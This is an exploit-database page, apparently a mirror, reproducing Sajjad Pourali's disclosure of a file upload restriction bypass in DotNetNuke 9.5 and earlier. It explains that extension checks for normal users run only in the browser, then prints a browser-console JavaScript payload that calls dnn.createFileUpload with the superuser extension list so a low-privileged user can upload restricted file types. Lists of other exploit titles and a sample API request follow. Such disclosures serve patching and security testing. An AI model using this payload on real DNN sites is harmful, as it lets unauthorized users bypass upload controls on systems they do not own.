Menu

Search for hundreds of thousands of exploits

"DotNetNuke 9.5 - File Upload Restrictions Bypass"

Author

Exploit author

"Sajjad Pourali"

Platform

Exploit platform

aspx

Release date

Exploit published date

2020-02-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
# Exploit Title: DotNetNuke 9.5 - File Upload Restrictions Bypass
# Date: 2020-02-23
# Exploit Author: Sajjad Pourali
# Vendor Homepage: http://dnnsoftware.com/
# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
# Version: <= 9.5
# CVE : N/A
# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175

The DNN has a file upload module for superuser. As a superuser, you can upload files with the following formats — “jpg, jpeg, jpe, gif, bmp, png, svg, ttf, eot, woff, doc, docx, xls, xlsx, ppt, pptx, pdf, txt, xml, xsl, xsd, css, zip, rar, template, htmtemplate, ico, avi, mpg, mpeg, mp3, wmv, mov, wav, mp4, webm, ogv”.

As a normal user you are allowed to upload files with “bmp,gif,ico,jpeg,jpg,jpe,png,svg” extensions. The same file upload module used for superuser is reused for normal users with extra validation for a few additional extensions e.g. CSS extension is not allowed.

Unfortunately, only for superuser, whitelisted extension check is performed at the server end. For normal users, extra extension validation is performed at client-side only. Hence, a low privileged normal user can bypass the client-side validation and upload files with extensions which are allowed only for superuser only.

For example, a normal privileged user can upload a file with extension which is allowed only for superuser, by executing the following code on a browser’s console (in the tab that manages profile’s page has opened). This attack may also be performed using proxy tools such as Burp, ZAP etc.

dnn.createFileUpload({
    "clientId": "dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_FileUploadControl",
    "moduleId": "",
    "parentClientId": null,
    "showOnStartup": true,
    "folderPicker": {
        "selectedItemCss": "selected-item",
        "internalStateFieldId": null,
        "disabled": false,
        "selectItemDefaultText": "",
        "initialState": {
            "selectedItem": {
                "key": "0",
                "value": "My Folder"
            }
        },
        "onSelectionChanged": []
    },
    "maxFileSize": 299892736,
    "maxFiles": 0,
    "extensions": ["jpg", "jpeg", "jpe", "gif", "bmp", "png", "svg", "ttf", "eot", "woff", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "xml", "xsl", "xsd", "css", "zip", "rar", "template", "htmtemplate", "ico", "avi", "mpg", "mpeg", "mp3", "wmv", "mov", "wav", "mp4", "webm", "ogv"],
    "resources": {
        "title": "Upload Files",
        "decompressLabel": "Decompress Zip Files",
        "uploadToFolderLabel": "Upload To:",
        "dragAndDropAreaTitle": "Drag files here or click to browse",
        "uploadFileMethod": "Upload File",
        "uploadFromWebMethod": "From URL",
        "closeButtonText": "Close",
        "uploadFromWebButtonText": "Upload",
        "decompressingFile": "Decompressing File",
        "fileIsTooLarge": "File size bigger than 286. Mb",
        "fileUploadCancelled": "Upload cancelled",
        "fileUploadFailed": "Upload failed",
        "fileUploaded": "File uploaded",
        "emptyFileUpload": "Your browser does not support empty file uploads.",
        "fileAlreadyExists": "The file you want to upload already exists in this folder.",
        "uploadStopped": "File upload stopped",
        "urlTooltip": "Enter Resource URL like https://SomeWebSite.com/Images/About.png",
        "keepButtonText": "Keep",
        "replaceButtonText": "Replace",
        "tooManyFiles": "You cannot upload more than {0} file(s) at once.",
        "invalidFileExtensions": "Some selected files with invalid extensions are excluded from upload.  You can only upload files with the following extensions: bmp, gif, ico, jpeg, jpg, jpe, png, svg.",
        "unzipFilePromptTitle": "Unzip Information",
        "unzipFileFailedPromptBody": "<div class=\"invalidFiles\"><p>[COUNT] of [TOTAL] file(s) were not extracted because their file types are not supported:</p>[FILELIST]</div>",
        "unzipFileSuccessPromptBody": "<div class=\"validFiles\"><p>[TOTAL] of [TOTAL] file(s) were extracted successfully.</p></div>",
        "errorDialogTitle": "Error"
    },
    "width": 780,
    "height": 630,
    "folderPath": dnn.dnnFileUpload.settings.dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_dnnFileUploadScope.folder,
    "parameters": {}
});
Release DateTitleTypePlatformAuthor
2020-04-01"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)"localwindowsHodorsec
2020-04-01"DiskBoss 7.7.14 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-31"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-31"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-24"Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2020-03-24"UliCMS 2020.1 - Persistent Cross-Site Scripting"webappsphpSunCSR
Release DateTitleTypePlatformAuthor
2020-02-24"DotNetNuke 9.5 - Persistent Cross-Site Scripting"webappsaspx"Sajjad Pourali"
2020-02-24"DotNetNuke 9.5 - File Upload Restrictions Bypass"webappsaspx"Sajjad Pourali"
2019-12-18"Telerik UI - Remote Code Execution via Insecure Deserialization"webappsaspx"Bishop Fox"
2019-12-17"NopCommerce 4.2.0 - Privilege Escalation"webappsaspx"Alessandro Magnosi"
2019-12-16"Roxy Fileman 1.4.5 - Directory Traversal"webappsaspx"Patrik Lantz"
2019-11-12"Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting"webappsaspxCy83rl0gger
2019-11-12"Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting"webappsaspxCy83rl0gger
2019-11-12"Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting"webappsaspxCy83rl0gger
2019-11-05"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection"webappsaspx"Fabian Mosch_ Nick Theisinger"
2019-09-25"Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistant Cross-Site Scripting"webappsaspx"Davide Cioccia"
2019-07-11"Sitecore 9.0 rev 171002 - Persistent Cross-Site Scripting"webappsaspx"Owais Mehtab"
2019-06-25"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal"webappsaspx"Aaron Bishop"
2019-06-20"BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection"webappsaspx"Aaron Bishop"
2019-06-19"BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution"webappsaspx"Aaron Bishop"
2019-06-19"BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution"webappsaspx"Aaron Bishop"
2019-06-13"Sitecore 8.x - Deserialization Remote Code Execution"webappsaspx"Jarad Kopf"
2019-02-12"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution"webappsaspx"Dustin Cobb"
2019-01-14"Umbraco CMS 7.12.4 - Authenticated Remote Code Execution"webappsaspx"Gregory Draperi"
2018-10-29"Library Management System 1.0 - 'frmListBooks' SQL Injection"webappsaspx"Ihsan Sencan"
2018-10-24"Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting"webappsaspx"Dino Barlattani"
2018-10-10"Ektron CMS 9.20 SP2 - Improper Access Restrictions"webappsaspxalt3kx
2018-08-06"Sitecore.Net 8.1 - Directory Traversal"webappsaspxChris
2018-06-04"EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting"webappsaspx"Chris Barretto"
2018-03-13"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities"webappsaspx"SEC Consult"
2018-02-02"IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting"webappsaspx1n3
2018-01-24"Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Arbitrary File Upload"webappsaspx"Paul Taylor"
2018-01-24"Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Encryption Keys Disclosure"webappsaspx"Paul Taylor"
2017-12-27"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)"webappsaspx"Glafkos Charalambous"
2017-11-16"LanSweeper 6.0.100.75 - Cross-Site Scripting"webappsaspx"Miguel Mendez Z"
2017-09-27"SmarterStats 11.3.6347 - Cross-Site Scripting"webappsaspxsqlhacker
Release DateTitleTypePlatformAuthor
2020-02-24"DotNetNuke 9.5 - Persistent Cross-Site Scripting"webappsaspx"Sajjad Pourali"
2020-02-24"DotNetNuke 9.5 - File Upload Restrictions Bypass"webappsaspx"Sajjad Pourali"
2013-08-15"DotNetNuke DNNArticle Module 10.0 - SQL Injection"webappsphp"Sajjad Pourali"
2013-08-13"DotNetNuke 6.1.x - Cross-Site Scripting"webappsasp"Sajjad Pourali"
2013-01-07"Ettercap 0.7.5.1 - Stack Overflow"dosunix"Sajjad Pourali"
2012-01-13"MailEnable Webmail - Cross-Site Scripting"webappsasp"Sajjad Pourali"
2012-01-12"MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting"webappsasp"Sajjad Pourali"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48125/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse